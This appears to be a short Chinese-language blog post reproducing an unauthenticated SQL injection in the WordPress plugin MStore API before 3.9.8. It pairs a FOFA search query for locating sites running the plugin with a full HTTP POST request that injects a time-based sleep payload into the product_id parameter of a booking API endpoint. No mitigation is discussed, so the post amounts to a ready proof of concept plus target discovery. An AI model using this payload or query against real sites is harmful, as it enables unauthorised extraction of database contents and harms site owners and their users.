Babing
Published on 2024-08-30 / 2 Visits
0
0

W5-3WordPress-WordPress_plugin-SQL

W5-3WordPress-WordPress plugin-SQL

漏洞描述:

WordPress plugin MStore API 3.9.8 版本之前存在SQL注入漏洞,该漏洞源于没有正确清理或转义某些字段,导致出现SQL注入,未经身份验证的远程攻击者可获取数据库敏感信息。

fofa语法:

body=“/wp-content/plugins/mstore-api/”

漏洞复现:

延时5秒
payload:

POST /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(5)--+- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

效果图:
效果图


Comment